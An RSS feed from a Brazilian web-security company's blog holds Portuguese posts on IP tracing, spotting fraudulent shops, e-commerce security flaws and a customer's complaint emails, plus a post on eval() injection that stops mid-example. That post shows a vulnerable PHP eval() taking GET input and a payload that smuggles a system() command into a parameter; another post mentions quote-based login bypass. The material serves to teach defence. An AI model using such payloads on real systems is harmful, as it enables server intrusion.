<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.0.10" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>TrustSign - Trust the Web</title>
	<link>http://blog.trustsign.com.br</link>
	<description>Certificação Digital, Segurança da Informação e Combate a Fraudes na Web</description>
	<pubDate>Mon, 08 Feb 2010 16:10:24 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.0.10</generator>
	<language>en</language>
			<item>
		<title>Rastreamento de atividades na internet, é possível?</title>
		<link>http://blog.trustsign.com.br/2010/02/05/rastreamento-de-atividades-na-internet-e-possivel/</link>
		<comments>http://blog.trustsign.com.br/2010/02/05/rastreamento-de-atividades-na-internet-e-possivel/#comments</comments>
		<pubDate>Fri, 05 Feb 2010 16:15:38 +0000</pubDate>
		<dc:creator>TrustSign</dc:creator>
		
		<category>Artigo de Segurança</category>

		<guid isPermaLink="false">http://blog.trustsign.com.br/2010/02/05/rastreamento-de-atividades-na-internet-e-possivel/</guid>
		<description><![CDATA[O ponto principal é: É TOTALMENTE POSSÍVEL o rastreamento de atividades na internet. Nas palestras que ministramos, temos nos deparado com muitos casos onde as pessoas perguntam sobre o rastreamento de atividades na internet. As principais dúvidas são: como o rastreamento ocorre, se é realmente possível e como fazer para não deixar pegadas.
Funciona assim:
1 – [...]]]></description>
			<content:encoded><![CDATA[<p>O ponto principal é: É TOTALMENTE POSSÍVEL o rastreamento de atividades na internet. Nas palestras que ministramos, temos nos deparado com muitos casos onde as pessoas perguntam sobre o rastreamento de atividades na internet. As principais dúvidas são: como o rastreamento ocorre, se é realmente possível e como fazer para não deixar pegadas.<br />
Funciona assim:</p>
<p>1 – Quando nos conectamos à internet nosso computador ganha um endereço IP (Internet Protocol ou Protocolo de Internet).</p>
<p>2 – Esse endereço é fornecido pelo provedor de internet que utilizamos (UOL, Terra, IG e outros) e permite navegarmos pela rede.</p>
<p>3 – Os provedores armazenam usuários e senhas que fazem o acesso, bem como o endereço IP utilizado na conexão.</p>
<p>4 – Ao desligar seu modem e ligá-lo novamente você ganha um outro endereço, o qual passa pelo processo acima e assim sucessivamente.</p>
<p>Em alguns casos, geralmente o de empresas, o IP que dá acesso a internet é sempre o mesmo, o que chamamos de IP fixo. Mas, quando falamos de empresas, podemos ter 2 computadores internos ou 2.000 e aí, como funciona?</p>
<p>As empresas possuem redes que são configuradas para que cada computador tenha um endereço IP em uma faixa diferente, podendo começar por 10. ou 168. ou 192., e nesse caso quem grava qual o computador que estava utilizando o IP X, é a empresa.</p>
<p>Resumindo, significa que se você envia um e-mail de dentro da empresa, será possível após receber o e-mail, saber qual o endereço IP da empresa e qual o endereço IP do computador que o enviou, e o mesmo vale para arquivos que são baixados por programas de compartilhamento ou sites acessados diretamente.</p>
<p>Existem formas de mascarar esse endereço, algumas complexas, outras nem tanto, e geralmente quem utiliza desse recurso o faz para executar alguma ação ilegal, porém é importante salientar que em todos os casos é possível, através de um rastreamento complexo, chegar ao destinatário ou em alguns casos ao culpado.</p>
<p>É isso aí&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.trustsign.com.br/2010/02/05/rastreamento-de-atividades-na-internet-e-possivel/feed/</wfw:commentRss>
		</item>
		<item>
		<title>DIA DA INTERNET SEGURA</title>
		<link>http://blog.trustsign.com.br/2010/01/29/dia-da-internet-segura/</link>
		<comments>http://blog.trustsign.com.br/2010/01/29/dia-da-internet-segura/#comments</comments>
		<pubDate>Fri, 29 Jan 2010 18:38:00 +0000</pubDate>
		<dc:creator>TrustSign</dc:creator>
		
		<category>Dicas de Segurança</category>

		<category>Artigo de Segurança</category>

		<guid isPermaLink="false">http://blog.trustsign.com.br/2010/01/29/dia-da-internet-segura/</guid>
		<description><![CDATA[Dia 09/02 será o “DIA DA INTERNET SEGURA” que tem por objetivo mobilizar os brasileiros para o uso seguro e responsável da rede. A TrustSign marcará presença com a pergunta: Como identificar Sites Fraudulentos? Como saber se uma compra não vai ser entregue em forma de dor de cabeça???
Nosso cenário de tecnologia é bastante propício [...]]]></description>
			<content:encoded><![CDATA[<p>Dia 09/02 será o “DIA DA INTERNET SEGURA” que tem por objetivo mobilizar os brasileiros para o uso seguro e responsável da rede. A TrustSign marcará presença com a pergunta: Como identificar Sites Fraudulentos? Como saber se uma compra não vai ser entregue em forma de dor de cabeça???</p>
<p>Nosso cenário de tecnologia é bastante propício a fraudes e certamente isso deriva de uma cultura de segurança muito nova ou quase que inexistente dos usuários em geral, e não apenas de uma legislação ainda “manca”.</p>
<p>É muito importante avaliar não apenas os preços encontrados e a estética do site, mas também fatores que podem determinar se você está seguro quanto a seus dados, sua privacidade e claro, sobre a ética e atuação da empresa onde você irá comprar.</p>
<p>Alguns passos muito importantes para a realização de sua compra:</p>
<p>1. Tenha a certeza de que o site que você está é realmente aquele que você digitou;</p>
<p>2. Verifique antes de comprar se o site oferece dados de contato legítimos, entre eles e-mail, telefone e endereço;</p>
<p>3. Faça pesquisas sobre o site na internet e procure identificar opiniões de pessoas que já tenham comprado neste mesmo local;</p>
<p>4. Leia atentamente a política de privacidade e de qualidade (compra, pagamentos, devolução, fretes, prazos, valores, etc) e se possível, pesquise no site da Receita Federal (www.receita.fazenda.gov.br) o CNPJ da empresa conferindo sua validade e autenticidade; </p>
<p>5. Ao efetuar a compra, antes de digitar seus dados pessoais e de pagamento, tenha a certeza de que a área que você está é restrita e segura. Isso é possível identificando a barra de endereços do navegador utilizado que muda de “HTTP” para “HTTPS” e também no lado direito superior a imagem de um cadeado de segurança. Clique sobre ele, de modo que a janela a ser aberta permita saber que o certificado de segurança exibido (cadeado) é válido e pertence empresa em questão;</p>
<p>6. Lembre-se, certificados de segurança não garantem que o site é seguro, mas sim que o site é autêntico e que as informações trafegadas no ambiente seguro são criptografadas. A simples exibição de selos não significa que o site realmente é autêntico, pois esses selos podem ser copiados. Para conferir sua autenticidade, sempre clique sobre a imagem do selo e confira os dados. Após o clique na imagem, se nada ocorrer, significa provavelmente que ela foi clonada;</p>
<p>7. Complementando, lembre-se também que boa parte de sua segurança depende da correta utilização de seu PC, leia mais em nosso artigo sobre mantenha seu PC Seguro.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.trustsign.com.br/2010/01/29/dia-da-internet-segura/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Quem é perigoso? Hackers, Crakers ou eu?</title>
		<link>http://blog.trustsign.com.br/2010/01/21/quem-e-perigoso-hackers-crakers-ou-eu/</link>
		<comments>http://blog.trustsign.com.br/2010/01/21/quem-e-perigoso-hackers-crakers-ou-eu/#comments</comments>
		<pubDate>Thu, 21 Jan 2010 14:10:48 +0000</pubDate>
		<dc:creator>TrustSign</dc:creator>
		
		<category>Artigo de Segurança</category>

		<guid isPermaLink="false">http://blog.trustsign.com.br/2010/01/21/quem-e-perigoso-hackers-crakers-ou-eu/</guid>
		<description><![CDATA[
É muito comum encontrarmos artigos técnicos e não técnicos comentando sobre invasões em computadores, redes, certificados digitais SSL ou sites seguros, afinal, diante da infinidade de facilidades e benefícios que a internet nos traz, temos também o número de fraudes que cresce assustadoramente todos os dias, fazendo o assunto estar sempre em alta. 
Hackers ou [...]]]></description>
			<content:encoded><![CDATA[<p><div class="centralizado"><img src="http://blog.trustsign.com.br/up/t/tr/blog.trustsign.com.br/img/_182_.jpg" alt=" 182  -  182 " title=" 182  -  182 " /></div></p>
<p>É muito comum encontrarmos artigos técnicos e não técnicos comentando sobre invasões em computadores, redes, certificados digitais SSL ou sites seguros, afinal, diante da infinidade de facilidades e benefícios que a internet nos traz, temos também o número de fraudes que cresce assustadoramente todos os dias, fazendo o assunto estar sempre em alta. </p>
<p>Hackers ou crackers? Serão esses os grandes responsáveis por esse aumento no número de fraudes? Serão assim tão complexas as ações que permitem o aumento das estatísticas? Independente de como minha aplicação ou website for feito, se eu tiver um certificado digital SSL, terei segurança? O que você realmente sabe sobre isso???</p>
<p>É importante sabermos que existem diferenças entre hackers e crackers, e que em grande parte das vezes que algum tipo de incidente ocorre, nenhum deles estava diretamente envolvido. Devido a vulnerabilidades existentes nos websites, aplicações, etc, basta que pessoas com o mínimo de conhecimento e um pouco de persistência vasculhem a web em busca de ferramentas que permitam identificar explorar as vulnerabilidades existentes, e teremos mais um fato que irá contribuir para o aumento das estatísticas.</p>
<p>Enquanto o mercado se expande e várias empresas de todos os portes abrem portas na internet, um problema mais grave acaba muitas vezes esquecido, tornando-se um grande vilão: A segurança em aplicações web. Chegando ao grande ponto dessa questão, a falta de segurança adequada nas aplicações web, é culpa do desenvolvedor e de quem não a exige. </p>
<p>No e-commerce a culpa também é nossa, pois compramos sem pesquisar o suficiente e sem exigir do lojista as garantias adequadas, criando assim um ciclo contínuo de irresponsabilidade digital. Devemos pesquisar mais, saber que um certificado digital SSL apenas garante a criptografia dos dados no momento da transação e que determinado site é verdadeiro, mas não garante a segurança do website, e é estritamente necessário que ao pensarmos em desenvolver algo, devemos fazê-lo com um profissional que tenha conhecimento nesse assunto e que conheça e adote as melhores práticas de segurança, incluindo normatizações específicas como, por exemplo, o PCI – Payment Card Industry (veja mais em https://www.pcisecuritystandards.org (inglês) ou http://www.visanet.com.br/VOL/portals/visaNetPub.portal?_nfpb=true&#038;_pageLabel=nDiferencialSegurancaPvsiPage (português).</p>
<p>Temos acompanhado muitos testes realizados em diversos websites de e-commerces e institucionais, além de muitos fóruns fechados que tratam do assunto, e o resultado não é nada agradável. Infelizmente, muitos desses sites exibem um selo de “Site Seguro”, mas não são. Nenhum ambiente é 100% seguro para essa afirmação, e não estamos falando dos melhores hackers do mundo ou crackers, mas sim de pessoas com pouco conhecimento em segurança que conseguem muitas vezes obter acesso à websites com a utilização de pouquíssimos recursos, e isso independente da linguagem e banco de dados utilizados.</p>
<p>Não raros são os casos onde, usando apenas strings de validação como ‘or’ e alguns outros, membros de comunidades de segurança ou de hacking, informam que conseguiram acesso ao banco de dados do website com poderes de administração. O grande problema nesse caso são os campos de autenticação.</p>
<p>É importante, se você desenvolve, aprender sobre, se você busca o serviço, cobrar sobre, e se você usa a web para compras, se informar sobre. Apenas assim nos protegemos do aumento das fraudes e apoiamos um movimento único que busca o aumento da segurança de nossos dados, e claro, nossos bolsos.</p>
<p>É isso aí, fica aqui mais um post.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.trustsign.com.br/2010/01/21/quem-e-perigoso-hackers-crakers-ou-eu/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Falhas em e-commerces, culpa de quem?</title>
		<link>http://blog.trustsign.com.br/2010/01/14/falhas-em-e-commerces-culpa-de-quem/</link>
		<comments>http://blog.trustsign.com.br/2010/01/14/falhas-em-e-commerces-culpa-de-quem/#comments</comments>
		<pubDate>Thu, 14 Jan 2010 15:11:35 +0000</pubDate>
		<dc:creator>TrustSign</dc:creator>
		
		<category>E-commerce</category>

		<guid isPermaLink="false">http://blog.trustsign.com.br/2010/01/14/falhas-em-e-commerces-culpa-de-quem/</guid>
		<description><![CDATA[
Um assunto que ganha proporções a cada dia, devido aos inúmeros casos que tornam-se notícias na mídia, são as falhas em e-commerces. Mas e a culpa? Afinal, muitas das vezes os consumidores sofrem com isso, pois fornecem os seus dados no cadastro.
O erro mais freqüente apontado são falhas de programação, motivo pelo qual dezenas de [...]]]></description>
			<content:encoded><![CDATA[<p><div class="centralizado"><img src="http://blog.trustsign.com.br/up/t/tr/blog.trustsign.com.br/img/Vo_faz_site.jpg" alt="Vo faz site - Vo faz site" title="Vo faz site - Vo faz site" /></div></p>
<p>Um assunto que ganha proporções a cada dia, devido aos inúmeros casos que tornam-se notícias na mídia, são as falhas em e-commerces. Mas e a culpa? Afinal, muitas das vezes os consumidores sofrem com isso, pois fornecem os seus dados no cadastro.</p>
<p>O erro mais freqüente apontado são falhas de programação, motivo pelo qual dezenas de reportagens apontam que mais de 80% dos sites de e-commerce existentes contém falhas de programação. As empresas cortam custos muitas vezes onde não deviam, optam por mão de obra não qualificada, contratam autodidatas, e o resultado é o prejuízo com dezenas de falhas de segurança que comprometem parcial ou totalmente o website, além de muitas vezes sacrificar os servidores com lentidão.</p>
<p>Muitas dessas falhas são extremamente graves e podem custar um bom dinheiro para as empresas que não tomam o devido cuidado. Existem “brechas” para ambientes Microsoft e Linux e para algumas delas é possível encontrar centenas de programas prontos que podem ser usados ou ir além disso e passar ao ambiente de desenvolvimento de códigos. Para tudo isso existem pessoas capazes e pessoas muito capazes.</p>
<p>Imagine seu banco de dados sendo manipulado, copiado ou destruído. Isso é o que ocorre em centenas de websites que nem mesmo imaginam o problema que enfrentam, o que faz com que uma falha simples se torne uma falha gravíssima, pois não se dá atenção a essa prática que é explorada aos milhares. </p>
<p>Em muitos desses casos, empresas descobrem e crêem terem sido vítimas de hackers ou crackers, mas o invasor, devido a falta de atenção com que o assunto é tratado, pode ser simplesmente “alguém com pouquíssimo conhecimento técnico”. Exemplos disso são os problemas existentes nos campos de login “usuário e senha” ou “e-mail e senha”, onde pode-se obter acesso como se fosse outro usuário e alterar ou deletar cadastros armazenados pelo site para obter informações pessoais sobre usuários.</p>
<p>Existem ainda situações de softwares que criam campos de login automaticamente sem que programadores utilizem códigos, e alguns desses softwares, como por exemplo o Ultradev, já tem uma vulnerabilidade de segurança que permite obter acesso a qualquer invasor.</p>
<p>O aumento de serviços on-line tem feito com que muitas empresas optem pela rapidez, criando problemas no mínimo funcionais, e claro, grandes problemas de segurança, já que esta última não entra no cronograma do projeto. </p>
<p>Análises de segurança e empresas sérias são itens fundamentais ao pensar em criar um website, ainda mais quando esse será focado em serviços on line. Basta lermos um pouco sobre o assunto e saberemos que a diferença entre os websites que prestam melhores serviços e vendem mais não está apenas na qualidade e nos preços, mas sim nos que oferecem segurança real a seus clientes.</p>
<p>Eu não compraria um produto com excelente preço se eu souber que meus dados podem ir parar na mão de pessoas que certamente os usarão para a prática de atos ilegais. E você?</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.trustsign.com.br/2010/01/14/falhas-em-e-commerces-culpa-de-quem/feed/</wfw:commentRss>
		</item>
		<item>
		<title>E começa mais um ano!</title>
		<link>http://blog.trustsign.com.br/2010/01/07/e-comeca-mais-um-ano/</link>
		<comments>http://blog.trustsign.com.br/2010/01/07/e-comeca-mais-um-ano/#comments</comments>
		<pubDate>Thu, 07 Jan 2010 16:57:40 +0000</pubDate>
		<dc:creator>TrustSign</dc:creator>
		
		<category>Equipe TrustSign</category>

		<guid isPermaLink="false">http://blog.trustsign.com.br/2010/01/07/e-comeca-mais-um-ano/</guid>
		<description><![CDATA[2009 foi marcado por grandes mudanças na TrustSign. A empresa passou por um processo estratégico de reestruturação e ganhou novo nome, novo site, nova identidade visual, novos colaboradores, passando a atuar exclusivamente na internet, tornou-se a primeira empresa brasileira realmente especializada em Segurança para Web e ganhou um espaço surpreendente no mercado digital. 
Hoje atuamos [...]]]></description>
			<content:encoded><![CDATA[<p>2009 foi marcado por grandes mudanças na TrustSign. A empresa passou por um processo estratégico de reestruturação e ganhou novo nome, novo site, nova identidade visual, novos colaboradores, passando a atuar exclusivamente na internet, tornou-se a primeira empresa brasileira realmente especializada em Segurança para Web e ganhou um espaço surpreendente no mercado digital. </p>
<p>Hoje atuamos em todas as camadas de segurança na web, emitindo certificados digitais de todos os tipos, analisando websites, servidores, appliances e códigos de sistemas e desenvolvendo controles e políticas para o atendimento aos requisitos do negócio.</p>
<p>Como previmos no começo de 2009, essa “nova velha empresa” nos surpreendeu com a dinâmica e ascenção que teve. Ganhamos muitos grandes clientes, tais como a TAM, CLARO, DROGASIL, LABORATÓRIO FLEURY, TODESCHINI e tantas outras empresas de renome internacional, que confiaram seus negócios aos nossos e tornaram-se parceiros nessa caminhada rumo ao sucesso.</p>
<p>Os projetos e desafios são grandes neste novo ano. Muitas coisas boas estão por vir que agregarão alto valor a TrustSign e à todos os envolvidos. Nossa equipe está muito bem preparada para atender com qualidade e simpatia e assim queremos continuar o sucesso em 2010.</p>
<p>Agradecemos a todos que estão nos acompanhando em nosso Blog, Twitter e Site. Os números de acessos às nossas ferramentas de relacionamento cresceram significativamente e por isso também queremos reafirmar o compromisso de em 2010 continuar levando matérias interessantes sobre o mundo digital, o compromisso com a responsabilidade social e o trabalho em equipe.</p>
<p>Um ótimo ano a todos nós,</p>
<p>É o que desejamos a todos os amigos blogueiros, clientes e parceiros.<br />
Equipe TrustSign!</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.trustsign.com.br/2010/01/07/e-comeca-mais-um-ano/feed/</wfw:commentRss>
		</item>
		<item>
		<title>É Natal! É época de fraudes…</title>
		<link>http://blog.trustsign.com.br/2009/12/29/e-natal-e-epoca-de-fraudes%e2%80%a6/</link>
		<comments>http://blog.trustsign.com.br/2009/12/29/e-natal-e-epoca-de-fraudes%e2%80%a6/#comments</comments>
		<pubDate>Tue, 29 Dec 2009 13:16:36 +0000</pubDate>
		<dc:creator>TrustSign</dc:creator>
		
		<category>Dicas de Segurança</category>

		<category>E-commerce</category>

		<guid isPermaLink="false">http://blog.trustsign.com.br/2009/12/29/e-natal-e-epoca-de-fraudes%e2%80%a6/</guid>
		<description><![CDATA[
Natal, sinônimo de consumo.
Você busca os menores preços e encontra na internet uma boa ferramenta para achá-los, mas&#8230; Você sabe onde está pisando? Será que o site onde está colocando os &#8220;pés do seu cartão de crédito&#8221; é realmente seguro? Porque onde tem grande demanda, para os vilões significa “oportunidade de ganhar dinheiro ilegalmente”.
Não foram [...]]]></description>
			<content:encoded><![CDATA[<p><div class="centralizado"><img src="http://blog.trustsign.com.br/up/t/tr/blog.trustsign.com.br/img/_91_.jpg" alt=" 91  -  91 " title=" 91  -  91 " /></div></p>
<p>Natal, sinônimo de consumo.<br />
Você busca os menores preços e encontra na internet uma boa ferramenta para achá-los, mas&#8230; Você sabe onde está pisando? Será que o site onde está colocando os &#8220;pés do seu cartão de crédito&#8221; é realmente seguro? Porque onde tem grande demanda, para os vilões significa “oportunidade de ganhar dinheiro ilegalmente”.</p>
<p>Não foram poucos os tópicos aqui postados com reclamações de empresas que efetivamente foram criadas para fraudar consumidores, e não estamos falando de empresas que tem problemas com logística.</p>
<p>Assim foi a saga de muitos internautas, que esperavam passar o natal com um presente que compraram para si ou para outros. Alguns que compraram produtos para a empresa onde trabalham e agora sabendo que caíram em um golpe preocupam-se com o seu “natal”, pois certamente não será fácil.</p>
<p>Muitos internautas perguntam até onde vai a impunidade, outros acreditam que não há leis suficientes, outros criam grupos de discussão para os lesados na esperança de que com a troca de informações possam obter ao menos parte do prejuízo, e agora falamos de compras de R$ 27,00 e de compras de R$ 4.000,00, e de um número de usuários fraudados que ultrapassa o número de 2.000 em um único site, então não falamos de fraudes pequenas, mas de casos que quando levados a justiça deveriam ter um desfecho mais rápido.</p>
<p>Exemplos clássicos foram recebidos aqui no Blog, lojas que ainda em operação fraudavam usuários a todo o tempo, reclamações e denúncias sobre as lojas e relatos de conhecimento das autoridades competentes, porém o tempo de investigação aparentemente muito longo foi um dos ítens que propiciou a possibilidade das fraudes, o que deu tempo de sobra para que as quadrilhas montassem seu golpe, aplicassem por 2 MESES e depois simplesmente sumissem do lugar. Agora o mais incrível, lojas idênticas e com coincidências inacreditáveis eram abertas com outros nomes 1 semana depois, e novamente o golpe aplicado por 1 a 2 MESES e mesmo assim, apesar das inúmeras reclamações dos internautas, novamente a história se repetiu e a quadrilha “ESCAFEDEU-SE” do lugar onde estavam, geralmente conjuntos comerciais na região central velha de São Paulo.</p>
<p>Dizer que é apenas importante tomar cuidados quando nas compras on-line já é pouco. Existem fóruns, blogs e sites com várias dicas de segurança. A cada dia o número de fraudes aumenta e a tendência é de que isso continue.</p>
<p>Hoje torna-se comum ver a polícia federal prender quadrilhas que roubam senhas de usuários e com isso desviam milhões, mas precisamos agora nos atentar e nos movimentar no sentido de que torne-se comum ver a polícia prender quadrilhas que aplicam golpes fazendo-se passar por lojas de e-commerce sérias.</p>
<p>Finalizamos apresentando um relato que conta a SAGA da internauta lesada Rita Gunther.</p>
<p>POR FAVOR SOLICITO QUE A PRESENTE SEJA LIDA NO AR E SEJA TAMBÉM LEVADA AO CONHECIMENTO DA LINHA DIRETA COM A JUSTIÇA, POR SE TRATAR DE ASSUNTO DE INTERESSE DA POPULAÇÃO EM FACE AO NÚMERO DE CONSUMIDORES ELETRONICOS!!!!</p>
<p><strong>1º E-mail</strong><br />
<em>MICROSIGOL… A SAGA…</p>
<p>Hoje, entrei no site da microsigol, novamente não houve o cumprimento da promessa que me foi feita ontem quanto ao envio dos notes.<br />
Depois de 5 ligações para referida empresa, não consegui falar com o ”responsável Sr. Erik”, já que o gerente nunca se encontra em seu local de trabalho, o que me faz pensar porque o mesmo ocupa a função de gerente? sou advogada trabalhista e nunca ouvi falar em ” gerencia a distancia”</p>
<p>O Funcionário Alex, só sabe repetir que o Sr. Erik está em reunião…, para que não sei, já que até o que se compromete a fazer não faz. Lembrem-se que ontem as 9.30 hs  ele estava na expedição embalando os ” notes para remessa”.</p>
<p>A Sra Keila pelo visto desconhece horas, minutos… já que as 10.30 hs de ontem ficou de me retornar ” sem falta” em 30 minutos  com o número  para rasteio de meu pedido….</p>
<p>Ressalto por oportuno que ” salvo melhor juízo” nenhum deles sabe anotar número de telefone, já que todos pediram  o número deste para retornar a ligação, e conforme já  asseverado, nenhum retorno foi dado.</p>
<p>Enfim a saga continua….QUANDO VOU RECEBER MEUS NOTES QUE JÁ FOI DESCONTADA A 1A PARCELA EM MEU CARTÃO DE CRÉDITO…<br />
NÃO PERCAM  OS PRÓXIMOS CAPITULOS…</p>
<p>VENHO PUBLICAMENTE DEMONSTRAR MINHA INSATISFAÇÃO COM A EMPRESA MICROSIGOL NOME FANTASIA DA ROGERS RODERLEI SIGOLO ME,  CNPJ Nº 07048084/0001-82, INSCRIÇÃO ESTADUAL 637270860119, LOCALIZADA EM SÃO CARLOS, QUE FAZ VENDA PELA INTERNET, PELOS MOTIVOS A SEGUIR EXPOSTOS,  QUE FOI LOCALIZADA NO SITE DA E.BIT.</p>
<p>NOS DIAS 09 E 12 DE NOVEMBRO FIZ A AQUISIÇÃO DE 3 NOTEBOOKS, NO DIA 14/11 TELEFONEI E FUI INFORMADA QUE OS PRODUTOS SERIAM ENCAMINHADOS NA SEMANA SEGUINTE. EM 25/11/2007, FOI DEBITADA EM MEU CARTÃO DE CRÉDITO A IMPORTANCIA RELATIVA AO PAGAMENTO DA 1A PARCELA DE 3 NOTES. ATÉ A PRESENTE DATA NÃO RECEBI OS APARELHOS E TODAS AS VEZES QUE LIGO, ME FALAM QUE O PRODUTO SERÁ POSTADO NO DIA SUBSEQUENTE E ATÉ AGORA NADA!</p>
<p>HOJE ENTREI NOVAMENTE EM CONTATO POR VOLTA DAS 9.30 HS E ME INFORMARAM QUE O SR. ERIK, SUB GERENTE DA FIRMA ESTAVA ENVIANDO OS NOTES ( Ontem o funcionário Alex me deu a mesma informação as 15.30hs…). Segundo a Sra Keila, funcionária  do Sr. Erik, ela me retornaria a ligação em 30 minutos, para passar o número do rastreio.</p>
<p>ATÉ AGORA NAAAAADA!<br />
Eu sou persistente, liguei de novo. O Alex me falou que o Erik está almoçando e a Keila também, resposta nenhuma me deu, enfim trata-se de uma empresa que gerente nunca está, Sr. Eduardo, o sub gerente não lhe atende, a secretaria ou sabe Deus que cargo ocupa, fala e não cumpre, enfim, ninguém cumpre o que promete. E os notes que eu preciso…. NADA</p>
<p>COBRAR SIM,  ENTREGA DE PRODUTOS NÃO!!!!!!</p>
<p>ATÉ QUE ME PROVEM O CONTRÁRIO, A EMPRESA SUPRA CITADA ESTÁ SE MOSTRANDO NÃO CONFIÁVEL.</em></p>
<p><strong>2º E-mail</strong><br />
<em>À MICROSIGOL:</p>
<p>Reitero os termos do email já encaminhado nesta data. Na semana passada me informaram que os notes seriam encaminhados na 3a feira passada. Afirmei que na 3a feira era feriado , no que fui informada por vcs que haveria expediente normal. Na 2a feira telefonei para vcs, pois precisava do número da remessa para fins de rastreamento, tendo sido novamente ” informada” que o produto não havia chegado à loja, mas seria recebido por voces na 3a feira dia 20. Na 4a feira entrei em contato e fui informada que não era problema de “chegar o produto na loja” mas sim que o prazo para o envio por voces era até a 6a feira dia 23.11, embora com certeza o produto seria enviado hoje para postagem…. OU SEJA CONTRARIANDO TODAS AS INFORMAÇÕES ANTERIORMENTE RECEBIDAS…</p>
<p>Hoje soube que não foi postado o produto.  Segundo o email de voces o prazo é de 10 dias uteis a contar da confirmação do pedido que, segundo voces, foi no dia 13. EMBORA CONSTE NO SITE A DATA DE 09 E 12/11! CONSIDERANDO QUE NINGUEM COMPRA 3 NOTES POR DESATINO OU POR EXCESSO DE PRAZER EM ADQUIRIR SEM RAZÃO, MAS SIM PORQUE ESTES SÃO IMPRESCINDIVEIS PARA O DESEMPENHO DE FUNÇÃO LABORAL, PERGUNTO: QUAL É O (NOVO) PRAZO QUE VOCES VÃO ME DAR AGORA PARA RECEBER MEUS PRODUTOS?????? Atenciosamente, Rita Gunther</p>
<p>CÓPIA NA INTEGRA DO EMAIL ENCAMINHA À MICROSIGOL ANTE A NÃO ENTREGA DE 3 PRODUTOS ADQUIRIDOS E JÁ DESCONTADA A PARCELA RELATIVA AO VALOR DESTES EM MEU CARTÃO DE CRÉDITO , FATURA DE 25/11.</em></p>
<p><strong>RESPOSTA DA EMPRESA:</strong></p>
<p><em>Boa tarde, Seu pedido foi confirmado dia 13/11. Após a confirmação de seu pagamento existe um prazo de até 10 dias úteis para envio de seu produto, tempo que corresponde ao processamento da demanda de produtos pelo setor de expedição, pois trabalhamos com uma cota diária de envios. Assim que seu produto for postado receberá um e-mail com o código de rastreio. </p>
<p>Angela Departamento de Vendas (16) 3501-1079//3501-1086<br />
www.microsigol.com.br</em></p>
<p><strong>3º E-mail</strong></p>
<p>De: Fale Conosco –<br />
Rita Giselda Ignarra Gunther Enviada em:<br />
quinta-feira, 22 de novembro de 2007 11:28<br />
Referente: Crítica<br />
Assunto: envio de 3 notebooks</p>
<p><em>Observacao: Bom dia. Gostaria de ter informações eficiente sobre o envio de 3 notes que adquiri em 09 e 12 deste mês. Cada vez q ligo me dão informações distintas. Saliento outrossim que tendo em vista que já foi feito o recebimento da parcela correspondente, sem vcs me terem entregue o produto, há violação do Cód. do consumidor, o qual em não me sendo enviado imediatamente os produtos que estou aguardando, será acionado, além da suspensão do pagamento das demais parcelas junto ao cartão de crédito, por meio de mandado de segurança. No aguardo de providencias efetivas, Rita Gunther</em></p>
<p>Infelizmente é isso que vemos hoje e continuamos esperando que espaços como o nosso possam servir para ajudar não apenas com informações públicas, mas na diminuição desses casos.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.trustsign.com.br/2009/12/29/e-natal-e-epoca-de-fraudes%e2%80%a6/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Vulnerabilidades com a função eval()</title>
		<link>http://blog.trustsign.com.br/2009/12/14/vulnerabilidades-com-a-funcao-eval/</link>
		<comments>http://blog.trustsign.com.br/2009/12/14/vulnerabilidades-com-a-funcao-eval/#comments</comments>
		<pubDate>Mon, 14 Dec 2009 14:59:01 +0000</pubDate>
		<dc:creator>TrustSign</dc:creator>
		
		<category>Dicas de Segurança</category>

		<guid isPermaLink="false">http://blog.trustsign.com.br/2009/12/14/vulnerabilidades-com-a-funcao-eval/</guid>
		<description><![CDATA[A função eval() é muito utilizada por facilitar a vida de desenvolvedores transformando strings em instruções javascript e executando-as em seguida (desde que a instrução esteja correta).
Vejamos abaixo um exemplo de código javascript:
document.getElementById(&#8221;meubotaovoltar&#8221;).onclick = function () {
if (historicode1 == &#8220;home&#8221;) { //historicode1 é minha variável que recebe o valor do último item clicado
location.href=&#8221;home.htm&#8221;; //faz a [...]]]></description>
			<content:encoded><![CDATA[<p>A função eval() é muito utilizada por facilitar a vida de desenvolvedores transformando strings em instruções javascript e executando-as em seguida (desde que a instrução esteja correta).<br />
Vejamos abaixo um exemplo de código javascript:</p>
<p>document.getElementById(&#8221;meubotaovoltar&#8221;).onclick = function () {<br />
if (historicode1 == &#8220;home&#8221;) { //historicode1 é minha variável que recebe o valor do último item clicado<br />
location.href=&#8221;home.htm&#8221;; //faz a chamada da página<br />
} else if (historicode1 == &#8220;contatos&#8221;) {<br />
location.href=&#8221;contatos.htm&#8221;<br />
}</p>
<p>E a seguir o mesmo código acima porém utilizando a função eval():</p>
<p>document.getElementById(&#8221;meubotaovoltar&#8221;).onclick = function () {<br />
eval(&#8221;location.href=&#8221;+historicode1+&#8221;.htm&#8221;);<br />
}</p>
<p>A função minimizou totalmente o código. Por tratar o conteúdo de forma dinamica a função Eval() pode ser abusada de varias formas e um dos ataques mais difundidos é o Eval Injection.<br />
Este ataque consiste na injeção de scripts que não são validados de forma apropriada pelo input de dados de usuário como parâmetro no site. Um usuário remoto pode inserir uma URL especialmente criada para enviar dados arbitrários para a função eval(). Isso resultará na execução do código pelo sistema vulneravel.<br />
O ataque irá executar o código com a mesma permissão que o web service está executando no servidor remoto, isso inclui comandos executados no sistema.</p>
<p>Exemplo 01 : Sistema vulnerável a Eval Injection.<br />
Vejamos o código abaixo:<br />
  $myvar = &#8220;varname&#8221;;<br />
  $x = $_GET[&#8217;arg&#8217;];<br />
  eval(&#8221;\$myvar = \$x;&#8221;); </p>
<p>Como pode ser visto acima a variavel $arg é repassada via parametro GET e  em seguida é processada dentro da chamada eval().  Poderiamos explorar facilmente isto setando o valor da variavel para “10; system(\”/bin/passwd\”);”. Neste caso o webserver iria executar o comando no sistema e exibiria todos os usuários do Linux;</p>
<p>Exemplo 2:  Injetando arquivos remotes para explorar a função vulnerável.<br />
